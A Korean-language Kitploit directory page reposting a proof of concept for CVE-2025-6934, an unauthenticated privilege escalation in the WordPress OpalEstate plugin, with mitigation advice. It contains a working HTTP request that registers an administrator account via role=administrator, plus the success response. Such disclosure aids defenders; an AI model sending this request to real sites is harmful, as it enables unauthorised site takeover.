Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-6934 — CVE-2025-6934 POC | Kitploit
도구/GitHubGitHub/mrjhaxcore/cve-2025-6934
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubmrjhaxcore/cve-2025-6934

CVE-2025-6934

CVE-2025-6934 POC

저장소 보기
11년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🚨 WordPress OpalEstate 플러그인 - 인증되지 않은 권한 상승 취약점

🔎 설명

WordPress용 OpalEstate 플러그인은 AJAX 등록 핸들러에 심각한 취약점을 포함하고 있어, 인증되지 않은 사용자가 관리자로 등록할 수 있습니다.

문제는 admin-ajax.php를 통해 공개적으로 노출된 opalestate_register_form AJAX 액션에서 role 매개변수를 안전하지 않게 처리하는 데 있습니다. 유효한 nonce를 가진 공격자는 role=administrator 필드를 제출하기만 하면 권한을 상승시켜 사이트 전체를 장악할 수 있습니다.

CVE ID: CVE-2025-6934 CVSS 점수: 9.8 (심각) 게시일: 2025년 6월 30일

📋 취약한 엔드포인트/ PoC

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 231 sec-ch-ua-platform: "Windows" Accept-Language: en-US,en;q=0.9 sec-ch-ua: "Chromium";v="133", "Not(A:Brand";v="99" sec-ch-ua-mobile: ?0 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/wordpress/?page_id=16 Accept-Encoding: gzip, deflate, br Cookie: wp-settings-time-1=1750938057; wp-settings-1=libraryContent%3Dbrowse; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; kawuda_cookie=1751024383267404614; PHPSESSID=rsbi6r8gs523c35v319f1jf4tt Connection: keep-alive

username=mrjtest&email=mrjtest%40gmail.com&password=123&password1=123&role=administrator&confirmed_register=on&opalestate-register-nonce=db20fa048c&_wp_http_referer=%2Fwordpress%2F%3Fpage_id%3D16&ajax=1&action=opalestate_register_form

응답

HTTP/1.1 200 OK Date: Wed, 02 Jul 2025 14:19:23 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Pragma: no-cache Content-Length: 53 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/json; charset=UTF-8

{"status":true,"redirect":"/wordpress/?page_id=16"}

영향

  • 전체 WordPress 사이트 장악
  • 인증되지 않은 관리자 계정 생성
  • 지속적인 백도어 액세스
  • 권한 체이닝 및 플러그인/테마 악용 가능성

🛡️ 완화 방법

  • 사용자 입력에서 role 매개변수를 제거하거나 삭제(sanitize)합니다.
  • 서버 측에서 역할 할당을 강제합니다 (예: 구독자만).
  • 잠긴 역할로 wp_insert_user() 또는 wp_create_user()를 사용합니다.
  • 민감한 작업을 처리하기 전에 사용자 권한을 검증합니다.
  • 플러그인을 패치하거나 중요하지 않은 경우 AJAX 등록을 비활성화합니다.

제작: MRJ HAXCORE

도구 다운로드